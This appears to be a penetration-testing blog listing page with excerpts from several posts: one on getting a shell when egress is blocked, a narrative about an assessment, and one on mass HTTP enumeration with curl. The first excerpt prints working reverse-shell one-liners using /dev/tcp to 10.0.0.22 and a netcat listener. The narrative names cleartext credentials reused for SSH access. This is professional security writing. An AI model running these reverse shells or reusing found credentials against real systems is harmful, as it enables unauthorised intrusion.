Shell
No Egress, No Shell, No Problem
Context, context, context; Alright, imagine this – you’re on an engagement, find a few vulnerabilities, run a few exploits and next thing you know you have Remote Code Execution (RCE). Now, like muscle memory, your next instinct would be to get a shell. Running the following is fairly simple:
sh -i >& /dev/tcp/10.0.0.22/4678 0>&1 Then listen in and…
nc -lvnp 4678 ... Huh? Sorry, I mean run this, and…
0<&196;exec 196<>/dev/tcp/10.0.0.22/4678; sh <&196 >&196 2>&196 …and…
Sail away, sail away, sail away
A while back, after some live music and drinks at Railways, I made my way to another city for pleasant weather, some dubious food, the ever-wakeful seagulls, and ultimately – an assessment.
After playing around for a few days, Jason and I had obtained access to a system which contained cleartext credentials, namely ihsadmin:ihsadmin.
Using these credentials, we were also able to SSH into a management server of sorts. While this was great, there were still several other servers in-scope that we had no access to. After scanning the network for a bit, I found out that a couple of these servers ran HTTP services on port 80, 8008 and 9080.
Efficient HTTP Scripting in the Shell
Javier had a simple shell script he posted to our internal chat a few days ago. It’s goal was to pull all the IP ranges for a country in preparation for a footprint from https://ipinfo.io/ (Let’s use PL as an example). Given this involved pulling multiple webpages, I was interested to know what the most efficient approach to this in the shell would be. Truthfully, the actual problem, pulling data from the site or gathering BGP routes, didn’t interest me, I wanted to look at how to do mass HTTP enum most efficiently with curl.
Page 1 of 1